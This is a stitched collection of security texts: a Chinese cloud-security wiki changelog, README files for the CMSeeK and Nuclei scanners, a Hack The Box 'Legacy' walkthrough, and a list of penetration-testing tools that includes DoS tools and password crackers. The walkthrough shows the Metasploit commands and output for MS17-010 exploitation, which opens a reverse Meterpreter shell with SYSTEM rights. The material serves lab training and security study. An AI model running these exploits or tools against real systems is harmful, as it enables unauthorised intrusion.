</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Docker 远程 API 未授权访问逃逸》<a href="/CloudNative/Docker/docker-remote-api-unauth-escape.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Privileged 特权模式容器逃逸》<a href="/CloudNative/Docker/docker-privileged-escape.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《挂载 Docker Socket 逃逸》<a href="/CloudNative/Docker/docker-socket-escape.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《挂载宿主机 procfs 逃逸》<a href="/CloudNative/Docker/docker-procfs-escape.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Docker 使用笔记》<a href="/CloudNative/Docker/docker-use-notes.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Terraform 代码安全性检查》<a href="/CloudNative/Terraform/terraform-code-security-check.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Terraform 可视化》<a href="/CloudNative/Terraform/terraform-visualization.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《启用插件缓存》<a href="/CloudNative/Terraform/terraform-enable-plugin-cache.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Terraform 初体验》<a href="/CloudNative/Terraform/terraform-experience.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Terraform 介绍与安装》<a href="/CloudNative/Terraform/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/About/" target="_blank"> 关于文库 </a>板块<br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Bucket 策略可写》<a href="/CloudService/S3/bucket-policy-able-to-write.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《特定的 Bucket 策略配置》<a href="/CloudService/S3/specific-bucket-policy-configuration.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Object ACL 可写》<a href="/CloudService/S3/object-acl-able-to-write.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Bucket ACL 可写》<a href="/CloudService/S3/bucket-acl-able-to-write.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Bucket 接管》<a href="/CloudService/S3/bucket-takeover.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Bucket 爆破》<a href="/CloudService/S3/bucket-brute-force.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《EC2 子域名接管》<a href="/CloudService/EC2/ec2-subdomain-takeover.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《获取共享快照内的数据》<a href="/CloudService/EC2/ec2-shared-snapshot.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《EC2 下的权限维持》<a href="/CloudService/EC2/ec2-permission-maintenance.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《使用用户数据执行命令》<a href="/CloudService/EC2/user-data.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《AWS 控制台接管》<a href="/CloudService/EC2/console-takeover.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《EC2 所面临的风险》<a href="/CloudService/EC2/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《S3 介绍》<a href="/CloudService/S3/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《k8s 下挂载 /var/log 逃逸》<a href="/CloudNative/Kubernetes/k8s-var-log-escape.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《K8s 提权漏洞 CVE-2018-1002105 学习》<a href="/CloudNative/Kubernetes/CVE-2018-1002105.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《K8s 所面临的风险》<a href="/CloudNative/Kubernetes/k8s-risks.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块<br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《K8s 介绍》<a href="/CloudNative/Kubernetes/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Docker 逃逸漏洞汇总》<a href="/CloudNative/Docker/docker-escape-vulnerability-summary.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Docker 所面临的风险》<a href="/CloudNative/Docker/docker-risks.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.4.14
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《云原生安全介绍》<a href="/CloudNative/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《Docker 介绍》<a href="/CloudNative/Docker/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块<br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《容器逃逸方法检测指北》<a href="/CloudNative/Docker/container-escape-check.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>开始搭建文库<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
|
<p align='center'>
<img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br>
<img src="https://img.shields.io/badge/Version-1.1.0-brightgreen.svg?style=style=flat-square" alt="version">
<img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version">
<img src="https://img.shields.io/aur/license/yaourt.svg?style=style=flat-square" alt="License">
</p>
## What is a CMS?
> A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*.
## Release History
```
- Version 1.1.0 [28-08-2018]
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
- Version 1.0.6 [23-07-2018]
...
```
[Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG)
## Functions Of CMSeek:
- Basic CMS Detection of over 130 CMS
- Drupal version detection
- Advanced Wordpress Scans
- Detects Version
- User Enumeration
- Plugins Enumeration
- Theme Enumeration
- Detects Users (3 Detection Methods)
- Looks for Version Vulnerabilities and much more!
- Advanced Joomla Scans
- Version detection
- Backup files finder
- Admin page finder
- Core vulnerability detection
- Directory listing check
- Config leak detection
- Various other checks
- Modular bruteforce system
- Use pre made bruteforce modules or create your own and integrate with it
## Requirements and Compatibility:
CMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed.
## Installation and Usage:
It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:
- git clone `https://github.com/Tuhinshubhra/CMSeeK`
- cd CMSeeK
- pip/pip3 install -r requirements.txt
For guided scanning:
- python3 cmseek.py
Else:
- python3 cmseek.py -u <target_url> [...]
Help menu from the program:
```
USAGE:
python3 cmseek.py (for a guided scanning) OR
python3 cmseek.py [OPTIONS] <Target Specification>
SPECIFING TARGET:
-u URL, --url URL Target Url
-l LIST, -list LIST path of the file containing list of sites
for multi-site scan (comma separated)
USER AGENT:
-r, --random-agent Use a random user agent
--user-agent USER_AGENT Specify a custom user agent
OUTPUT:
-v, --verbose Increase output verbosity
VERSION & UPDATING:
--update Update CMSeeK (Requires git)
--version Show CMSeeK version and exit
HELP & MISCELLANEOUS:
-h, --help Show this help message and exit
--clear-result Delete all the scan result
EXAMPLE USAGE:
python3 cmseek.py -u example.com # Scan example.com
python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated)
python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here
python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent
python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com
```
## Checking For Update:
You can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update.
P.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update.
## Detection Methods:
CMSeek detects CMS via the following:
- HTTP Headers
- Generator meta tag
- Page source code
- robots.txt
## Supported CMSs:
CMSeeK currently can detect **133** CMSs, you can find the list on [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory.
All the cmss are stored in the following way:
```
cmsID = {
'name':'Name Of CMS',
'url':'Official URL of the CMS',
'vd':'Version Detection (0 for no, 1 for yes)',
'deeps':'Deep Scan (0 for no 1 for yes)'
}
```
## Scan Result:
All of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\<Target Site>` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well.
Here is an example of the json report log:
![Json Log](https://i.imgur.com/5dA9jQg.png)
## Bruteforce Modules:
CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:
1. Add a comment exactly like this `# <Name Of The CMS> Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex
2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module
3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory
4. Open CMSeeK and Rebuild Cache using `U` as the input in the first menu.
5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.
<p align='center'>
<img alt="Cache Rebuild Screenshot" width="400px" src="https://i.imgur.com/2Brl7pl.png" />
</p>
## Need More Reasons To Use CMSeeK?
If not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages.
Also you can try reading comments in the code those are pretty random and weird!!!
## Screenshots:
<p align="center">
<img alt="Main Menu" width="600px" src="https://s8.postimg.cc/ha6754v6t/cmseek_-v_068.png" />
<br><em>Main Menu</em><br>
<img alt="Scan Result" width="600px" src="https://s8.postimg.cc/f6vrxg0it/result.png" />
<br><em>Scan Result</em><br>
<img alt="WordPress Scan Result" width="600px" src="https://i.imgur.com/CK4O1Yd.png" />
<br><em>WordPress Scan Result</em><br>
</p>
## Opening issue:
Please make sure you have the following info attached when opening a new issue:
- Target
- Exact copy of error or screenshot of error
- Your operating system
**Issues without these informations might not be answered!**
## Disclaimer:
**Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.**
## License:
CMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE)
## Follow Me @r3dhax0r:
[Twitter](https://twitter.com/r3dhax0r) || [Facebook](https://fb.com/r3dhax0r) || [Instagram](https://instagram.com/r3dhax0r)
## Team:
[Team : Virtually Unvoid Defensive (VUD)](https://twitter.com/virtuallyunvoid)
|
<h1 align="left">
<img src="static/nuclei-logo.png" alt="nuclei" width="200px"></a>
<br>
</h1>
[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT)
[![Go Report Card](https://goreportcard.com/badge/github.com/projectdiscovery/nuclei)](https://goreportcard.com/report/github.com/projectdiscovery/nuclei)
[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei/issues)
[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH)
Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use.
Nuclei is used to send requests across targets based on a template leading to zero false positives and providing effective scanning for known paths. Main use cases for nuclei are during initial reconnaissance phase to quickly check for low hanging fruits or CVEs across targets that are known and easily detectable. It uses [retryablehttp-go library](https://github.com/projectdiscovery/retryablehttp-go) designed to handle various errors and retries in case of blocking by WAFs, this is also one of our core modules from custom-queries.
We have also [open-sourced a dedicated repository](https://github.com/projectdiscovery/nuclei-templates) to maintain various type of templates, we hope that you will contribute there too. Templates are provided in hopes that these will be useful and will allow everyone to build their own templates for the scanner. Checkout the templating guide at [**nuclei.projectdiscovery.io**](https://nuclei.projectdiscovery.io/templating-guide/) for a primer on nuclei templates.
# Resources
- [Resources](#resources)
- [Features](#features)
- [Usage](#usage)
- [Installation Instructions](#installation-instructions)
- [From Binary](#from-binary)
- [From Source](#from-source)
- [From Github](#from-github)
- [Nuclei templates](#nuclei-templates)
- [Running nuclei](#running-nuclei)
- [1. Running nuclei with a single template.](#1-running-nuclei-with-a-single-template)
- [2. Running nuclei with multiple templates.](#2-running-nuclei-with-multiple-templates)
- [3. Automating nuclei with subfinder and any other similar tool.](#3-automating-nuclei-with-subfinder-and-any-other-similar-tool)
- [4. Running nuclei in a Docker](#running-in-a-docker-container)
- [Thanks](#thanks)
# Features
<h1 align="left">
<img src="static/nuclei-run.png" alt="nuclei" width="700px"></a>
<br>
</h1>
- Simple and modular code base making it easy to contribute.
- Fast And fully configurable using a template based engine.
- Handles edge cases doing retries, backoffs etc for handling WAFs.
- Smart matching functionality for zero false positive scanning.
# Usage
```bash
nuclei -h
```
This will display help for the tool. Here are all the switches it supports.
| Flag | Description | Example |
|:-------------------:|:-------------------------------------------------------:|:----------------------------------------------------:|
| -c | Number of concurrent requests (default 10) | nuclei -c 100 |
| -l | List of urls to run templates | nuclei -l urls.txt |
| -target | Target to scan using templates | nuclei -target hxxps://example.com |
| -t | Templates input file/files to check across hosts | nuclei -t git-core.yaml |
| -t | Templates input file/files to check across hosts | nuclei -t nuclei-templates/cves/ |
| -nC | Don't Use colors in output | nuclei -nC |
| -json | Prints and write output in json format | nuclei -json |
| -json-requests | Write requests/responses for matches in JSON output | nuclei -json -json-requests |
| -o | File to save output result (optional) | nuclei -o output.txt |
| -pbar | Enable the progress bar (optional) | nuclei -pbar |
| -silent | Show only found results in output | nuclei -silent |
| -retries | Number of times to retry a failed request (default 1) | nuclei -retries 1 |
| -timeout | Seconds to wait before timeout (default 5) | nuclei -timeout 5 |
| -debug | Allow debugging of request/responses. | nuclei -debug |
| -update-templates | Download and updates nuclei templates | nuclei -update-templates |
| -update-directory | Directory for storing nuclei-templates(optional) | nuclei -update-directory templates |
| -v | Shows verbose output of all sent requests | nuclei -v |
| -version | Show version of nuclei | nuclei -version |
| -proxy-url | Proxy URL | nuclei -proxy-url hxxp://127.0.0.1:8080 |
| -proxy-socks-url | Socks proxy URL | nuclei -proxy-socks-url socks5://127.0.0.1:8080 |
| -H | Custom Header | nuclei -H "x-bug-bounty: hacker" |
# Installation Instructions
### From Binary
The installation is easy. You can download the pre-built binaries for your platform from the [Releases](https://github.com/projectdiscovery/nuclei/releases/) page. Extract them using tar, move it to your `$PATH`and you're ready to go.
```bash
https://github.com/projectdiscovery/nuclei/releases
tar -xzvf nuclei-linux-amd64.tar.gz
mv nuclei /usr/local/bin/
nuclei -h
```
### From Source
nuclei requires **go1.14+** to install successfully. Run the following command to get the repo -
```bash
> GO111MODULE=on go get -u -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei
```
In order to update the tool, you can use -u flag with `go get` command.
### From Github
```bash
git clone https://github.com/projectdiscovery/nuclei.git
cd nuclei/v2/cmd/nuclei/
go build .
mv nuclei /usr/local/bin/
nuclei -h
```
# Nuclei templates
You can download or update the nuclei templates using `update-templates` flag.
```bash
> nuclei -update-templates
```
or download it from [nuclei templates](https://github.com/projectdiscovery/nuclei-templates) Github project.
```bash
> git clone https://github.com/projectdiscovery/nuclei-templates.git
```
**Please refer to [this guide](https://nuclei.projectdiscovery.io/templating-guide/) to writing your own custom templates.**
# Running nuclei
### 1. Running nuclei with a single template.
This will run the tool against all the hosts in `urls.txt` and returns the matched results.
```bash
> nuclei -l urls.txt -t files/git-core.yaml -o results.txt
```
You can also pass the list of hosts at standard input (STDIN). This allows for easy integration in automation pipelines.
This will run the tool against all the hosts in `urls.txt` and returns the matched results.
```bash
> cat urls.txt | nuclei -t files/git-core.yaml -o results.txt
```
### 2. Running nuclei with multiple templates.
This will run the tool against all the hosts in `urls.txt` with all the templates in the `path-to-templates` directory and returns the matched results.
```bash
> nuclei -l urls.txt -t cves/ -o results.txt
```
### 3. Automating nuclei with subfinder and any other similar tool.
```bash
> subfinder -d hackerone.com -silent | httpx -silent | nuclei -t cves/ -o results.txt
```
### Running in a Docker Container
You can use the [nuclei dockerhub image](https://hub.docker.com/r/projectdiscovery/nuclei). Simply run -
```bash
> docker pull projectdiscovery/nuclei
```
- After downloading or building the container, run the following:
```bash
> docker run -it projectdiscovery/nuclei
```
For example, this will run the tool against all the hosts in `urls.txt` and output the results to your host file system:
```bash
> cat urls.txt | docker run -v /path-to-nuclei-templates:/go/src/app/ -i projectdiscovery/nuclei -t ./files/git-config.yaml > results.txt
```
Remember to change `/path-to-nuclei-templates` to the real path on your host file system.
-------
# Thanks
nuclei is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team. Community contributions have made the project what it is. See the **[Thanks.md](https://github.com/projectdiscovery/nuclei/blob/master/THANKS.md)** file for more details.
Do also check out these similar awesome projects that may fit in your workflow:
- [Burp Suite](https://portswigger.net/burp)</br>
- [FFuF](https://github.com/ffuf/ffuf)</br>
- [Jaeles](https://github.com/jaeles-project/jaeles)</br>
- [Qsfuzz](https://github.com/ameenmaali/qsfuzz)</br>
- [Inception](https://github.com/proabiral/inception)</br>
- [Snallygaster](https://github.com/hannob/snallygaster)</br>
- [Gofingerprint](https://github.com/Static-Flow/gofingerprint)</br>
- [Sn1per](https://github.com/1N3/Sn1per/tree/master/templates)</br>
- [Google tsunami](https://github.com/google/tsunami-security-scanner)</br>
- [ChopChop](https://github.com/michelin/ChopChop)<br>
|
# Legacy
URL: https://app.hackthebox.com/machines/Legacy
Level: Easy
Date 26 May 2020
## Walkthrough
- [Enumeration](#enumeration)
# Enumeration
## NMAP
We found SAMBA service.
We found that we can try Eternal Blue:
```
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1
```
We then use `ms17_010_psexec`:
```
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
```
We run it:
```
msf5 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.33:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81f621b8
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... ISnirvJD.exe
[*] 10.10.10.4:445 - Created \ISnirvJD.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \ISnirvJD.exe...
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
[*] Meterpreter session 1 opened (10.10.14.33:4444 -> 10.10.10.4:1031) at 2020-06-09 23:43:13 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
And we get SYSTEM shell:
```
meterpreter > shell
Process 1248 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
```
|
# Tools
* [Security Tools list](https://sectools.org)
* [Kali Linux](https://www.kali.org/downloads/): Linux distro specifically for Penetration testing, strict Debian based
* [Back track Linux](https://www.backtrack-linux.org/): Precursor to Kali Linux (since 2013), Ubuntu based.
* [MacChanger](https://www.hackingtutorials.org/general-tutorials/mac-address-spoofing-with-macchanger/): Change mac-addresses of your network interfaces to allow for anonymization or spoofing [https://www.youtube.com/watch?v=7nF2BAfWUEg&t=12469s](Basic tutorial on 3:34:05)
## Information gathering
* [You Get Signal](https://www.yougetsignal.com/tools/web-sites-on-web-server/): Reverse IP domain check
* [Initial Scan](https://github.com/SolomonSklash/initial-scan): A tool for performing an initial, information-gathering scan of websites for penetration tests.
* [Osmedeus](https://github.com/j3ssie/Osmedeus): Automatic Reconnaissance and Scanning in Penetration Testing
* [Foca](https://www.elevenpaths.com/labstools/foca/index.html): Fingerprinting Organizations with Collected Archives is a tool used mainly to find metadata and hidden information in the documents its scans.
* [GitGot](https://github.com/BishopFox/GitGot): Scans GitHub for secrets
## Search engines for Hackers:
* [Censys.io](https://censys.io/): Exposed devices & services lookup, based on IP or CIDR blocks
* [Shodan](https://www.shodan.io/): IoT search engine
* [Greynoise](https://viz.greynoise.io/table): Overview of baseline untargeted "internet background noise" of scans and attacks
* [Wigle.net](https://wigle.net/): Wifi, Bluetooth and Cell-tower indexer
* [Publicwww](https://publicwww.com/): HTML source-code scanner, Find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code.
* [Hunter.io](https://hunter.io/): E-mail address search engine
* [HIBP](https://haveibeenpwned.com/): Have I Been Pwned, see if an account (based on mail-address) has been breached and in what leak
* [Pipl](https://pipl.com/): People Search engine
* [OSInt](https://osintframework.com/): Information gathering from free and semi-free resources. Links to many other search engines.
## Network scanning
* Nmap: Network scanning tool, comes with most Linux distributions, but also available on Windows
* Zenmap: GUI front-end to Nmap
* [GoScan](https://github.com/marco-lancini/goscan): Similar to NMap, developed in Go
* [Wireshark](https://www.wireshark.org): DPI scanning / sniffing tool
* [Userguide](https://www.wireshark.org/docs/wsug_html_chunked/)
* [Filter reference guide](https://www.wireshark.org/docs/dfref/)
* [Burp Suite / Portswigger](https://portswigger.net/burp/communitydownload) (Euro 350 / year, limited functionality community edition available): Penetration testing, detailed analysis and (manual / automated) modification of network traffic. Ideal for webapp hacking
* OWASP [ZAP](https://owasp.org/www-project-zap/)
* [OWASP ZAP HUD](https://www.youtube.com/watch?v=1hbKGDgx_p0): Presentation by Simon Bennetts for OWASP London
* [Ettercap](http://www.ettercap-project.org/ettercap/downloads.html): Network sniffing (incl. SSH & HTTPS)
## Calculating with IP-addresses:
* [Subnet calculator](http://www.subnet-calculator.com/)
* [CIDR calculator](http://www.subnet-calculator.com/cidr.php)
## Network hacking
* [Aircrack-NG](https://www.aircrack-ng.org/downloads.html): Wireless network cracking
* [Angry IP Scanner](https://angryip.org/download/#linux): IP & port scanner
* enum: Enumerate Windows shares using null-sessions
* enum4linux: Enumerate Windows shares using null-sessions
## IDS
* [Snort](https://www.snort.org/): Opensource IDS
* [OSSEC](https://www.ossec.net/): Opensource IDS
* [IDS FAQ](http://www.linuxsecurity.com/resource_files/intrusion_detection/network-intrusion-detection.html)
### DoS tools
* [Nemesy](http://packetstormsecurity.com/files/25599/nemesy13.zip.html): Windows tool to generate random packets.
* Land and LaTierra: IP spoofing and opening TCP connections
* [Blast](http://www.opencomm.co.uk/products/blast/features.php)
* Panther: Flood target with UDP packets
* Botnets: Multitudes of compromised computers to perform DDoS attacks
## Encoding & Decoding
* [Base64](https://www.base64encode.org/)
* [Hex to ASCII](https://www.rapidtables.com/convert/number/hex-to-ascii.html)
* [UUEncode](http://uuencode.online-domain-tools.com/)
## Password and crypto hacking
* [Hashcat](https://hashcat.net/hashcat/): Highspeed hashed password cracking tool
* [RainbowCrack](http://project-rainbowcrack.com/index.htm): Hash-cracker based on Rainbow-tables
* [CrypTool](https://www.cryptool.org/en/ct1-downloads): Cryptology tool (OpenSource, Win32 only)
* [MD5this](http://www.md5this.com/): Online MD5 cracker
* [John the Ripper](http://www.openwall.com/john/): Command prompt tool. Uses wordlists
* [Cain & Abel](http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml): Windows tool with GUI to recover crack / recover passwords of various tools, network sniffing etc.
* [Ophcrack](http://ophcrack.sourceforge.net/): Cross platform tool uses Rainbow table attacks or brute force.
* [Hydra](https://sectools.org/tool/hydra/): Dictionary attacks against numerous network protocols
* [Pipal](https://digi.ninja/projects/pipal.php): Password Analyser [Usage tips](./pipal.md)
* [NebulousAD](https://blog.nuid.io/nebulousad/): Credential Auditor for Active Directory (K-anonymity is planned, but not available yet)
## Database
* [SleuthQL](https://github.com/RhinoSecurityLabs/SleuthQL) identifies parameters and values for potential SQL-injection attacks
* [SQLMap](tools/sqlmap.md): Database penetration, mapping & data-extraction tool for various database-types including support for various blind extraction techniques.
* [AutoSQLi](https://github.com/jesuiscamille/AutoSQLi): An automatic SQL Injection tool which takes advantage of ~DorkNet~ Googler, Ddgr, WhatWaf and sqlmap.
## Web app
* [Netsparker](https://www.netsparker.com) (5k+ / year): Web app security scanner
